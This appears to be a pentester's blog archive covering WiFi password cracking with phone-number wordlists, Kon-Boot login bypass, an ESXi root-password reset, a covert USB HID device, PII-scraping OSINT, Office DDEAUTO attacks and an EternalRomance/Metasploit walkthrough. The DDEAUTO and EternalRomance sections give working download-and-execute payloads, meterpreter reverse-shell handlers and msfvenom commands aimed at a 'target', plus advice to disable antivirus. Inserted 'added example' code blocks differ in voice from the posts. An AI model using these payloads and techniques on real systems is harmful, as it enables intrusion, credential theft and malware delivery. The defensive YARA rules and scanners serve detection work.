Cracking WiFi – phone number wordlist

I used to see a lot of networks set up where either the tech or the end user chose the person's or business's phone number as the password, so I usually test those first when trying to crack a WiFi password.

I was looking into more efficient ways to crack the password if you're working in a virtual machine and don't have access to a GPU cracking rig to run hashcat. You can pipe crunch to aircrack-ng on the fly and reduce some of the keyspace by prepending the area code:
crunch 10 10 -t 860%%%%%%% | aircrack-ng /root/handshake.cap -e MyESSID -w-
This results in testing 10 million different numbers. But you can reduce that keyspace and avoid unnecessary CPU time by pre-generating a wordlist of all the numbers and then removing the exchange prefixes that aren't in use.

NANP (North American Numbering Plan) numbers are ten digits long, in the format NXX-NXX-XXXX, where N is any digit 2-9 and X is any digit 0-9.
So any exchange prefix that starts with 1 or 0 can be removed, and any N11 service code (411, 911, etc.) can be removed too, reducing the keyspace. Checking online databases of exchange listings for each state will let you shrink the keyspace even further by removing unused/reserved exchanges.
Also, as of September 2016, all 555 numbers have been returned to the NANPA inventory except 555-1212 (national use directory assistance) and 555-4334 (national use assigned.) The fictitious, non-working numbers, 555-0100 through 555-0199, will remain reserved for entertainment/advertising.
So keep in mind that we can remove another 102 entries per area code with this regex:
^86055501[0-9][0-9]|^8605551212|^8605554334
Connecticut doesn't use the 555 prefix at all currently, though, so we're just going to remove the whole 555 prefix. Using crunch again and some regex grep'ing:

crunch 10 10 -t 860%%%%%%% > 860.txt
grep -vP '^860[01]|^860[2-9]11|^860[235679]00|^86093[1467]|^86095[089]|^860555|^86096[09]|^860976|^86098[01]|^86099[46]' 860.txt > 860numbers.txt
This knocks the results down to:
wc -l 860.txt 860numbers.txt
10000000 860.txt
7710000 860numbers.txt
reduced keyspace = 2,290,000

Now you're thinking, shit, there's usually more than one area code per state. Connecticut has 203, 860, 475, and 959. 959 doesn't have any exchanges yet afaik, 475 has relatively few exchanges currently, and 203 actually has more exchanges in use than 860. So we just do the same thing for 203:

crunch 10 10 -t 203%%%%%%% > 203.txt
grep -vP '^203[01]|^203[2-9]11|^203[235679]00|^203203|^203475|^203555|^203860|^20395[089]|^203976|^203999' 203.txt > 203numbers.txt

This knocks the results down to:
10000000 203.txt
7770000 203numbers.txt
reduced keyspace = 2,230,000
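As an added example (not code from the post), here is a small Python script that applies the same NANP rules and the same per-area-code exclusions used in the grep patterns above. It counts the surviving keyspace from the 1,000 possible exchanges instead of generating 10 million lines first, can print the equivalent grep -vP pattern, and can write the wordlist itself. The exclusion lists are copied from the post's patterns for 860 and 203; they are not a current exchange listing, so check them against one before relying on them.

```python
import re
from typing import Iterator, Sequence

# Exchange (NXX) patterns the post strips for each Connecticut area code,
# lifted from its grep alternations. Constructed for this example; verify
# against a current exchange listing before trusting them.
AREA_CODE_EXCLUSIONS = {
    "860": ["[235679]00", "93[1467]", "95[089]", "555", "96[09]", "976", "98[01]", "99[46]"],
    "203": ["[235679]00", "203", "475", "555", "860", "95[089]", "976", "999"],
}


def valid_exchanges(area_code: str) -> list[str]:
    """Return the NXX exchanges that survive the NANP rules plus the post's exclusions."""
    excluded = [re.compile(p + "$") for p in AREA_CODE_EXCLUSIONS.get(area_code, [])]
    keep = []
    for n in range(1000):
        nxx = f"{n:03d}"
        if nxx[0] in "01":          # NANP: first digit of an exchange is 2-9
            continue
        if nxx[1:] == "11":         # N11 service codes (211, 411, 911, ...)
            continue
        if any(rx.match(nxx) for rx in excluded):
            continue
        keep.append(nxx)
    return keep


def keyspace(area_code: str) -> int:
    """Candidate passwords left: surviving exchanges times the 10,000 line numbers each."""
    return len(valid_exchanges(area_code)) * 10_000


def grep_pattern(area_code: str) -> str:
    """The same filter as a PCRE alternation for grep -vP (no empty alternative at the end)."""
    parts = [f"^{area_code}[01]", f"^{area_code}[2-9]11"]
    parts += [f"^{area_code}{p}" for p in AREA_CODE_EXCLUSIONS.get(area_code, [])]
    return "|".join(parts)


def candidates(area_code: str) -> Iterator[str]:
    """Lazily yield every surviving 10-digit number in ascending order."""
    for nxx in valid_exchanges(area_code):
        for line in range(10_000):
            yield f"{area_code}{nxx}{line:04d}"


def write_wordlist(path: str, area_codes: Sequence[str]) -> int:
    """Write one combined wordlist for several area codes; returns the line count."""
    written = 0
    with open(path, "w") as fh:
        for ac in area_codes:
            for number in candidates(ac):
                fh.write(number + "\n")
                written += 1
    return written


if __name__ == "__main__":
    for ac in ("860", "203"):
        print(f"{ac}: {len(valid_exchanges(ac))} exchanges -> {keyspace(ac)} candidates")
        print(f"  grep -vP '{grep_pattern(ac)}'")
```

keyspace() reproduces the post's 7,710,000 and 7,770,000 line counts (2,290,000 and 2,230,000 removed) from the exchange table alone, and candidates() emits the survivors in the same ascending order crunch would, so a list written with write_wordlist() feeds aircrack-ng or john exactly like the grep'd files.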

After doing this for each area code, you can cat the files together to create a wordlist that you can pipe to aircrack-ng or John the Ripper. If you're a lazy reader from Connecticut, I am attaching the compiled wordlist allctphonenumbers.zip (16.7mb) of all 860/203/475 area codes (15,760,000 total).

It shouldn't take too long to test against a captured handshake to see if they used a phone number for the password. Using the 203 area code wordlist it took about 12 minutes, because it basically starts at the first phone number (i.e. 2032000000):
aircrack-ng -w /root/ctphonenumbers203.txt /root/handshake.cap -e MyESSID

Or you can use John the Ripper. First convert the cap file using:
hcxhash2cap --pmkid=test.16800 -c handshake.cap
then
john -w:allctnumbers.txt --format=wpapsk --pot=pmkid.cracked.pot test.16800

It took about an hour on a VM to run through both area codes and crack it.


If you are lucky enough to be able to use hashcat, the remaining numbers go pretty quick with a good GPU, and you can also help reduce the keyspace using charsets. A mask run over the 7 remaining digits took about 1 second to crack.

PMKID
hashcat -m 16800 handshake.16800 -a 3 -1 23456789 203?1?d?d?d?d?d?d -w 4 --force -O
hashcat -m 16800 handshake.16800 -a 3 -1 23456789 860?1?d?d?d?d?d?d -w 4 --force -O

WPA/WPA2
hashcat -m 2500 handshake.hccapx -a 3 -1 ?d -2 23456789 860?2?1?1?1?1?1?1 -w 4 --force -O
hashcat -m 2500 handshake.hccapx -a 3 -1 ?d -2 23456789 203?2?1?1?1?1?1?1 -w 4 --force -O

Yes, cracking a WPA PMKID with a wordlist can be slow: with the 203 wordlist it took 53 seconds to crack, while brute-forcing the PMKID with a charset mask on the GPU took one second 🙂
hashcat -m 16800 pkid.16800 -a 3 -1 23456789 203?1?d?d?d?d?d?d --force

So wordlists aren't that great, but if you're stuck on a sub-par PC and need something in a pinch it's worth trying before you move on to larger wordlists etc. I'm writing this just for notes at 6 am, and suck at math, so let me know in the comments if I have any mistakes in the calculations etc. Will be doing a follow-up article on how to capture PMKIDs on vulnerable targets.
Happy cracking.


Kon-Boot

Kon-Boot password tool

Kon-Boot is an awesome tool that I've used extensively in tech jobs I've had in the past (it's been around since 2009), for clients that couldn't remember their password :/ or an employee that was fired etc. Most recently on Red-Team pentest engagements when I've had physical access to a box and needed quick and stealthy access. It allows accessing a target computer (Windows/Mac OSX) without knowing the user's password.

Kon-Boot does not need to remove or modify the user's password, and all changes are reverted to the previous state after a system restart, unlike other tools that just remove/modify the password. It is currently the only solution I know of that can bypass Windows 10 online passwords.

Their latest versions (since 2.7) let me run PowerShell scripts on Win8/10 machines, which allows me to automate data exfiltration or quickly add persistent access to the box. The Sticky Keys escalation feature (spawns a system prompt before logging in by pressing the Shift key 5 times) allows quick access to system-level resources without worrying about the user's access level or group policy.

Supported operating systems:

Microsoft Windows systems (both x86 and x64) :
   XP, Vista, 7, 8/8.1, 10, Server 2003/2008

Apple OSX / macOS systems:
   Apple OSX 10.7-10.11
   Apple macOS Sierra (10.12)
   Apple macOS High Sierra (10.13)
   Apple macOS Mojave (10.14)

Links:
https://kon-boot.com
http://thelead82.com
https://www.piotrbania.com/all/kon-boot/

Tutorials: https://kon-boot.com/docs/
Twitter: https://twitter.com/thelead82

ESXi 6.7 Password recovery / reset

Recently I had done some training where we set up ESXi 6.7 on an Intel NUC. It had been over a month since I'd touched it. Apparently during the training my coworker had set a root password for the install, which was supposedly written down, but was either typed wrong in the notes or fat-fingered while setting it. Unfortunately, you can no longer boot into single user mode or the Service Console to reset the password, and VMware suggests you reinstall ESXi to reset it. I didn't want to risk that method because I wasn't sure if it would affect the currently installed VMs, and I didn't have a copy of ESXi with me to do so. Instead I used a bootable Kali USB to mount the ESXi drive and reset the root password to a blank password by editing the shadow file.

Here are the steps I took to regain access to my ESXi NUC.

First, I checked the drives on the machine using the lsblk command, then used udisksctl to mount nvme0n1p5. Once mounted, I copied the state.tgz file to /tmp and untar'd it. It had another .tgz file called local.tgz inside, which I untar'd too, using this command:
tar -xf state.tgz && tar -xf local.tgz

I then used nano to edit the root entry in the shadow file that was now in the etc folder, with nano etc/shadow. (I also saved the hash, because I wanted to try to crack it with hashcat regardless, to see what the hell it was.)

Basically remove everything between the colons after the username, so it looks like the image below.

After saving the file I tar’d it back up and moved it back to the mounted directory, then rebooted and removed the Kali USB.

Upon reboot I was greeted with the ESXi logon screen, and was able to log in with root and a blank password.

Here's the plaintext output, just in case you can get online from your device and want to copy pasta.

root@kali:/mnt# lsblk
NAME        MAJ:MIN RM   SIZE RO TYPE MOUNTPOINT
loop0         7:0    0   2.9G  1 loop /usr/lib/live/mount/rootfs/filesystem.squashfs
sda           8:0    1  29.3G  0 disk 
├─sda1        8:1    1   3.1G  0 part /usr/lib/live/mount/medium
└─sda2        8:2    1   736K  0 part /media/root/Kali Live
nvme0n1     259:0    0 465.8G  0 disk 
├─nvme0n1p1 259:1    0     4M  0 part /media/root/ESXi
├─nvme0n1p2 259:2    0     4G  0 part /media/root/4E99-06DA
├─nvme0n1p3 259:3    0 458.4G  0 part 
├─nvme0n1p5 259:4    0   250M  0 part 
├─nvme0n1p6 259:5    0   250M  0 part /media/root/4E99-06D71
├─nvme0n1p7 259:6    0   110M  0 part 
├─nvme0n1p8 259:7    0   286M  0 part /media/root/4E99-06D72
└─nvme0n1p9 259:8    0   2.5G  0 part 
root@kali:/mnt# udisksctl mount -b /dev/nvme0n1p5
Mounted /dev/nvme0n1p5 at /media/root/4E99-06D7.
root@kali:/mnt# cp /media/root/4E99-06D7/state.tgz /tmp
root@kali:/mnt# cd /tmp
root@kali:/tmp# tar -xf state.tgz
root@kali:/tmp# tar -xf local.tgz 
root@kali:/tmp# rm *.tgz
root@kali:/tmp# nano etc/shadow
root@kali:/tmp# tar -cf local.tgz etc/
root@kali:/tmp# tar -cf state.tgz local.tgz
root@kali:/tmp# mv state.tgz /media/root/4E99-06D7/
root@kali:/tmp# udisksctl unmount -b /dev/nvme0n1p5
Unmounted /dev/nvme0n1p5.
root@kali:/tmp# reboot
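An added example (not from the post): a POSIX shell script that builds a throwaway state.tgz with the same nesting as the ESXi one above (state.tgz containing local.tgz containing etc/shadow) and then reads root's password field back out of it. It is a way to confirm what a repacked state.tgz will do before copying it onto the boot partition, and the same check, run against a real state.tgz, flags a host whose root hash has been blanked. The shadow line, its hash and its date field are constructed placeholders; the archives are gzip-compressed here, which tar -xf detects on extraction.

```sh
#!/bin/sh
# Added example (not from the post). Builds a sample state.tgz with the ESXi
# nesting (state.tgz -> local.tgz -> etc/shadow) and audits the root entry.
set -eu

# make_sample_state OUT_PATH PASSWORD_FIELD
# Constructed data: a one-line shadow file whose root password field is $2.
make_sample_state() {
    work=$(mktemp -d)
    mkdir -p "$work/etc"
    printf 'root:%s:18000:0:99999:7:::\n' "$2" > "$work/etc/shadow"
    ( cd "$work" && tar -czf local.tgz etc && tar -czf state.tgz local.tgz )
    mv "$work/state.tgz" "$1"
    rm -rf "$work"
}

# root_password_field STATE_TGZ
# Unpacks both layers into a scratch directory and prints root's password field.
root_password_field() {
    work=$(mktemp -d)
    tar -xf "$1" -C "$work"
    tar -xf "$work/local.tgz" -C "$work"
    awk -F: '$1 == "root" { print $2 }' "$work/etc/shadow"
    rm -rf "$work"
}

# audit_root STATE_TGZ  -> prints empty | locked | hashed
# "empty" is exactly what the nano edit above produces: anyone at the console
# or DCUI can log in as root with no password, so it is worth alerting on.
audit_root() {
    pw=$(root_password_field "$1")
    case "$pw" in
        "")       echo empty ;;
        '*'|'!'*) echo locked ;;
        *)        echo hashed ;;
    esac
}

demo() {
    dir=$(mktemp -d)
    make_sample_state "$dir/state.tgz" '$6$PLACEHOLDER$notarealhash'   # placeholder hash
    echo "with hash:      $(audit_root "$dir/state.tgz")"
    make_sample_state "$dir/blank.tgz" ''
    echo "after blanking: $(audit_root "$dir/blank.tgz")"
    rm -rf "$dir"
}
demo
```

Point audit_root at a state.tgz copied off a mounted ESXi boot partition (the same /media/root/.../state.tgz path as in the transcript) to check a host; "empty" means the root account accepts a blank password at the next boot.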

Covert Lighter HID Attack Tool

On Twitter about a month ago @jermainlaforce had an awesome idea of hiding a USB HID device inside a lighter case, using one of those cheap Chinese spycams you can find on eBay for $5. HID attack tools are nothing new; here's a video of one I made in 2011 using a Teensy board (turn down your volume).

All you need to do is open the top of the case and gut the insides, then replace the hardware with a USB dev board (WHID, Ducky, Digispark, Teensy etc.). I also ended up ordering one because I figured I'd recycle the camera guts to monitor a dropbox location on an upcoming red team engagement. The process of building this out is fairly simple and straightforward.

I decided to use a Digispark board because you can also get cheap knockoff ones on eBay for like $1.50. I have a bunch of these laying around from various projects and it's cheap; the whole project cost about $6.50. The camera button ended up broken during shipping, so I ended up just ripping it all apart by yanking the USB metal to pull the guts out of the case (it had a dab of glue to hold it tight).

I then de-soldered the USB connector from the camera board to reuse on the Digispark board, since it has one of those on-board USB connectors.

I then soldered it to the Digispark, going pin for pin with the board.

Replaced the top portion that holds it to the case, and added some hot glue to keep it from wiggling around inside.

Slide everything back together and you’re golden.

Depending on which dev board you used, I have some example payloads on my GitHub to get you started with some attack ideas.

Telephreak Tactical Lunchbox


One of the cooler pieces of swag I received @ Defcon this year was a lunchbox for the Telephreak party, filled with candy, gadgets, and toys from telephreakbadge. I do some 'red teaming' occasionally and always had my stuff all janky in my backpack with no way to really keep it all tidy, and it was a pain in the ass to go through everything to find the tools I needed. Plus stuffing them all in a box tends to get shit broken eventually. I was thinking I needed something like a Pelican case but I didn't feel like spending a huge amount on something simple. So one day I figured this lunchbox sitting on my desk would do the trick. I ended up getting a few pieces of polyethylene foam off eBay for $9. They arrived pretty quick and I spent about an hour or so arranging some of my most used tools onto each layer and cutting out the foam to fit them all in. I used a small knife (the ones that have a knife/scissor/toothpick) and a razor blade to cut out the foam. Here are all 3 layers that fit inside, with descriptions of each tool's usage.

Layer 1

  • with an acrylic case – highly customizable USB attack platform (HID, Network etc.)

Layer 2

  • Hak5 WIFI Pineapple – various wifi attack tools
  • Firefighter Swipe Tool – open doors
  • DigiSpark DigiStump attiny85 dev board – cheap rubber ducky alternative that you dont have to worry about losing
  • Hook Tool – open some door latch bolts

Layer 3

  • as a bonus, my Asus Nexus 7 loaded with Kali NetHunter also fits inside

skiptracer

My new open source Python OSINT framework, skiptracer, was released @ HushCon East on June 1st. Initial attack vectors for recon usually involve utilizing pay-for-data APIs (Recon-ng) or paying to use transforms (Maltego) to get data-mining results. skiptracer instead uses some basic Python web scraping of PII paywall sites to compile passive information on a target. The modules allow queries for phone/email/screen names/real names/addresses/IP/hostname/breach credentials etc. It will help you collect relevant information about a target to help expand your attack surface. Everyone should be encouraged to submit new ideas/modules. You can get the code here: https://github.com/xillwillx/skiptracer feel free to submit new modules or code fixes.

Office DDEAUTO attacks

SensePost posted 10 days ago about a vulnerability which can trigger command execution, without the use of macros, when someone opens a specially crafted Office document. Although a little bit of social engineering needs to come into play for the victim to click 'yes' to the first 2 of 3 message boxes, most end users are easily tricked. They found that by abusing the parameters of the DDEAUTO field they could use PowerShell to download malicious payloads remotely. DDE is a legacy Inter-Process Communication (IPC) mechanism dating back to 1987, which establishes a dynamic data exchange (DDE) link with a document created in another Microsoft Windows-based program (when new information becomes available in a linked document, a DDE field inserts the new information when you update the field). SensePost discovered that instead of specifying an application like Excel, an attacker can specify an arbitrary application as the first parameter, and quoted arguments as the second parameter (which cannot exceed 255 bytes).

Although SensePost only demonstrated this using Word, they left other ideas up to the reader. Over the past week a bunch of other ways to accomplish code execution in Word, Excel, and even Rich Text Outlook emails have been thrown around on Twitter. I'll go over some of the items I have been able to test successfully in my lab.

The quick and easy test:
Open a new Word document, press CTRL+F9, paste this between the {} brackets, then save the file:
DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"

You should have something similar that looks like the image above.

Payloads:
Although popping calc is cute and all for demo purposes, you can do more mischievous things to execute malicious payloads on a target system.

DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -w hidden -nop -ep bypass Start-BitsTransfer -Source "http://willgenovese.com/hax/index.js"; -Destination "index.js" & start c:\\Windows\System32\cmd.exe /c cscript.exe index.js"

DDEAUTO c:\\windows\\system32\\cmd.exe "/k regsvr32 /s /n /u /i:http://willgenovese.com/hax/calc.sct scrobj.dll "

DDEAUTO c:\\windows\\system32\\cmd.exe "/k certutil -urlcache -split -f http://willgenovese.com/hax/test.exe && test.exe"

DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://willgenovese.com/hax/evil.ps1');powershell -e $e "

I’ve also created a bash script that uses CactusTorch to automatically generate reverse TCP/HTTP/HTTPS meterpreter payloads in vbs/hta/js that you can insert into Word documents for testing. https://github.com/xillwillx/CACTUSTORCH_DDEAUTO

I've also seen in the wild that you can obfuscate the message box contents, furthering your social-engineering attempts to trick the user into clicking yes.
DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden IEX (New-Object System.Net.WebClient).DownloadString('http://willgenovese.com/hax/evil.ps1'); # " "Microsoft Document Security Add-On"

Although PowerShell web-download scripts are easier to do, you might want to have your payload all in one document so it's not calling out over the network for your binary. Dave Kennedy updated his Unicorn python script to generate a msfvenom meterpreter payload that gets base64 encoded/decoded when the DDEAUTO is triggered. Dave recently merged some fixes I sent him, along with the way to obfuscate the message boxes.
Open a console in Kali:

IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
git clone https://github.com/trustedsec/unicorn.git && cd unicorn
python unicorn.py windows/meterpreter/reverse_https $IP 443 dde
cat powershell_attack.txt  | xclip -selection clipboard | leafpad powershell_attack.txt 

Paste your cat'd payload into Word and save it, then send it to your target. Then in a new console window open your meterpreter handler to receive some shells.

IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LHOST '$IP';set LPORT 443; set ExitOnSession false;exploit -j -z"

* if you need your external IP, change the first line of code to:
IP="$(dig +short myip.opendns.com @resolver1.opendns.com)"

Outlook:
You can also trigger this with an Outlook Rich Text email message; the only caveat on Outlook 2013/2016 is that you need to embed an image/chart/object into it first before adding the DDEAUTO payload.
Open a new Word document, press CTRL+F9, and paste your payload between the {} brackets, then open a new Outlook email message. Go to the Format Text tab and change the message to Rich Text formatting.

In the body of the message copy and paste any image into the body.

From your Word document copy your DDEAUTO payload, then paste it into the body of the email. Enter the recipient etc. and send. You'll get the DDE prompts; just say no to them. When your recipient receives the email, it won't trigger until they press reply. If they press yes to the first 2 message boxes then it'll execute your payload.

Calendar Invites:
Another attack vector would be recurring Calendar invites. Every time the target opens it they get re-owned.

Mitigations:
This has been tested to work on doc(x/m), dot(x/m), rtf, Word xml, draft msg & oft files, since it's the underlying Word parser that triggers this behavior when these file types are opened. Microsoft responded that it is a feature and no further action will be taken to fix it (unless of course the current ransomware attacks and other viruses force their hand).
wdormann made a quick .reg gist that helps disable DDEAUTO in the registry, although it does break some things in OneNote.

NVISO also made some YARA rules to detect DDE:

// YARA rules Office DDE
// NVISO 2017/10/10 - 2017/10/12
// https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
  
rule Office_DDEAUTO_field {
  strings:
    $a = /.+?\b[Dd][Dd][Ee][Aa][Uu][Tt][Oo]\b.+?/
  condition:
    $a
}
  
rule Office_DDE_field {
  strings:
    $a = /.+?\b[Dd][Dd][Ee]\b.+?/
  condition:
    $a
}
 
rule Office_OLE_DDEAUTO {
  strings:
    $a = /\x13\s*DDEAUTO\b[^\x14]+/ nocase
  condition:
    uint32be(0) == 0xD0CF11E0 and $a
}
 
rule Office_OLE_DDE {
  strings:
    $a = /\x13\s*DDE\b[^\x14]+/ nocase
  condition:
    uint32be(0) == 0xD0CF11E0 and $a
}

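An added example (not from the post and not NVISO's code): a Python scanner that applies the same idea as the YARA rules above to a document on disk, with one practical addition. In a .docx, Word frequently splits a single field instruction across several w:instrText runs, so grepping document.xml or matching one run at a time can miss "DDEAUTO"; the scanner reassembles each field between its fldChar begin and separate/end markers before matching. For legacy .doc files it reuses the 0x13/0x14 byte pattern from NVISO's OLE rules, and for RTF it searches the text. The minimal .docx builder and its sample field text are constructed for the example and are not real documents.

```python
import io
import re
import zipfile
from xml.etree import ElementTree as ET

W_NS = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
# In the legacy .doc binary, field code text sits between 0x13 (field begin) and
# 0x14 (field separator); this mirrors the byte pattern in NVISO's OLE rules.
OLE_DDE_RE = re.compile(rb"\x13\s*DDE(AUTO)?\b[^\x14]*", re.IGNORECASE)
DDE_WORD_RE = re.compile(r"\bDDE(AUTO)?\b", re.IGNORECASE)


def field_instructions_from_docx(data: bytes) -> list[str]:
    """Reassemble every field instruction in word/*.xml. Word commonly splits one
    instruction across several <w:instrText> runs, so we join the runs of each
    field (begin .. separate/end) before anyone looks for DDEAUTO in them."""
    instructions = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            current = None
            for el in ET.fromstring(zf.read(name)).iter():
                if el.tag == W_NS + "fldChar":
                    kind = el.get(W_NS + "fldCharType")
                    if kind == "begin":
                        current = []
                    elif kind in ("separate", "end") and current is not None:
                        instructions.append("".join(current))
                        current = None
                elif el.tag == W_NS + "instrText" and current is not None:
                    current.append(el.text or "")
                elif el.tag == W_NS + "fldSimple":       # single-element field form
                    instructions.append(el.get(W_NS + "instr", ""))
    return instructions


def naive_run_scan(data: bytes) -> bool:
    """What a per-run match (or a grep over document.xml) sees; misses split fields."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        root = ET.fromstring(zf.read("word/document.xml"))
    return any(DDE_WORD_RE.search(el.text or "") for el in root.iter(W_NS + "instrText"))


def scan_document(data: bytes) -> list[str]:
    """Return the DDE field instructions found in a .docx, .doc (OLE) or .rtf blob."""
    if data.startswith(b"PK"):
        return [i for i in field_instructions_from_docx(data) if DDE_WORD_RE.search(i)]
    if data.startswith(OLE_MAGIC):
        return [m.group(0)[1:].decode("latin-1").strip() for m in OLE_DDE_RE.finditer(data)]
    if data.startswith(b"{\\rtf"):
        text = data.decode("latin-1")
        return [text[m.start():m.start() + 60] for m in DDE_WORD_RE.finditer(text)]
    return []


def build_sample_docx(instr_runs: list[str]) -> bytes:
    """Constructed minimal .docx (sample data, not a real document) holding one
    field whose instruction text is split across the given <w:instrText> runs."""
    runs = "".join(f'<w:r><w:instrText xml:space="preserve">{r}</w:instrText></w:r>'
                   for r in instr_runs)
    xml = (f'<w:document xmlns:w="{W_NS[1:-1]}"><w:body><w:p>'
           '<w:r><w:fldChar w:fldCharType="begin"/></w:r>' + runs +
           '<w:r><w:fldChar w:fldCharType="separate"/></w:r><w:r><w:t>result</w:t></w:r>'
           '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", xml)
    return buf.getvalue()


# Constructed samples: the post's calc test split over two runs, and a benign DATE field.
SPLIT_PAYLOAD_RUNS = [" DD", "EAUTO c:\\\\windows\\\\system32\\\\cmd.exe \"/k calc.exe\" "]
BENIGN_RUNS = [" DATE ", "\\@ \"M/d/yyyy\" "]

if __name__ == "__main__":
    doc = build_sample_docx(SPLIT_PAYLOAD_RUNS)
    print("per-run match sees it:", naive_run_scan(doc))
    print("reassembled fields   :", scan_document(doc))
```

Feed scan_document() the raw bytes of any attachment pulled from a mail gateway or file share; a non-empty result is the field text to show the analyst. The split-run case is the one to remember when tuning simpler signatures: a rule that only looks inside one XML element will pass exactly the documents an attacker bothers to hand-edit.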
Exploiting with EternalRomance using Metasploit installed inside Win10 WSL

This post will have a few sections. We will go over some general information on the ETERNALROMANCE exploit, learn how to install WSL on the Win10 Creators Update along with Metasploit, and, as a bonus, I will show how to do this on Kali and show a few additional tricks to download payloads to the target machine.

The original ETERNALROMANCE is a remote code execution (RCE) exploit targeting legacy SMBv1 that came from a leak on April 14, 2017, by a group calling themselves the Shadow Brokers. It was part of a weaponized exploit collection attributed to the NSA and Equation Group called Lost_In_Translation, which targeted Windows XP/Vista/7 and Windows Server 2003/2008. It takes advantage of CVE-2017-0145, which has been patched by the MS17-010 security bulletin. File sharing over SMB is normally used only within local networks; if an attacker has access to a vulnerable endpoint running SMB, they can gain SYSTEM privileges. ETERNALROMANCE takes advantage of a bug in access to named pipes; more in-depth information can be found here.

The original exploit required that you generate shellcode using DoublePulsar, which was also in the dump. There were a few posts demonstrating this when it first hit the net, but you were limited to their shellcode: if you tried to use other shellcode the exploit would blue screen the target machine. You were also not able to exploit any newer machines above Server 2008.

We will be using some updated python code from sleepya that fixes some issues (BSOD) with the original ETERNALROMANCE code and allows exploiting Windows 2000/XP/Vista/7/8.1/2008 R2/2012 R2/2016 R2.
ETERNALROMANCE requires authentication, either through the Guest account if it's enabled, or otherwise with a username and password previously obtained from the target machine. For this demonstration we will assume the target machine has Guest enabled. *Even with a Guest account, the exploit gives us SYSTEM privileges.

To start off I am going to assume you already have the Creators Update installed on Windows 10 (which finally solves some issues with ping on WSL, but Nmap is still jacked up :/ ).

Installing WSL Ubuntu:

Turn on Developer Mode
Open Settings -> Update and Security -> For developers
Select the Developer Mode radio button


Open a command prompt and run bash.

Accept the license, the Ubuntu image will download and install.

Launch a new Ubuntu shell by running bash from a cmd or PowerShell prompt, or by typing bash in the start menu and clicking it. Create a new user and password,
then run sudo apt-get update && sudo apt-get upgrade -y, since the image will be behind. You should be ready to install Metasploit now.


Installing Metasploit:

Most of this info I borrowed from Darkoperator's blog post, since essentially it's the same idea as installing Metasploit on Ubuntu. You want to disable Windows Defender and also add an exclusion for %userprofile%\AppData\Local\lxss in Windows Defender's settings, otherwise it might break the install of some of the payloads etc. that get detected. In your bash window you're going to paste all these commands and make sure you don't get any errors.

sudo add-apt-repository -y ppa:webupd8team/java
sudo apt-get update
sudo apt-get -y install oracle-java8-installer
sudo apt-get update
sudo apt-get upgrade
sudo apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev

cd ~
git clone git://github.com/sstephenson/rbenv.git .rbenv
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
exec $SHELL

git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc

git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo
exec $SHELL
RUBYVERSION=$(wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/.ruby-version -q -O - )
rbenv install $RUBYVERSION
rbenv global $RUBYVERSION
ruby -v

Right about this time you'll want to get some coffee or a Monster, because ruby is going to take a long time to finish. Once finished it should print the version that installed. Now we're going to skip a few steps like setting up postgresql and Nmap, because we won't need a DB for now and Nmap is not currently working in WSL. So let's move on to getting Metasploit installed.

cd /opt
sudo git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
gem install bundler
bundle install
sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'

So hopefully at this point you have Metasploit installed. You can test it by typing msfconsole in the bash prompt.


Exploiting the Target
Now comes the easy part. I'll give you some easy commands you can type in 3 different bash windows. Open the windows one at a time: the Metasploit handler will take a bit to start up, so you can open a second window and create a msfvenom payload, which will also take a little bit to finish creating and encoding. Once both of those are finished, open a 3rd bash window and paste the commands; it should download the EternalRomance python and smb.py to help exploit our target and should automagically swap in your IP and our new download payload, using sed to replace the default stuff. I chose to use certutil to download our msfvenom meterpreter payload from our python SimpleHTTPServer and then execute it.

With your open msfconsole window, test our target IP first to see if it's exploitable:
use auxiliary/scanner/smb/pipe_auditor
set RHOSTS [TargetIP]
exploit

If your target machine is exploitable then continue with the next step of opening the 3 bash windows. You can also choose to use any pipe name ('netlogon', 'spoolss', 'browser' etc.) when using EternalRomance.py in window 3 (I chose 'netlogon'); also don't forget to change [TargetIP] to your target's IP.


Bash Window #1 – MetaSploit Handler

IP=`ifconfig wifi0 | grep "inet addr" |awk -F: '{print $2}'| awk '{print $1}'`
msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST '$IP';set ExitOnSession false;exploit -j -z"

Bash Window #2 – Create msfvenom payload and start python webserver
IP=`ifconfig wifi0 | grep "inet addr" |awk -F: '{print $2}'| awk '{print $1}'`
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP -e shikata_ga_nai -i 3 -f exe > 1.exe
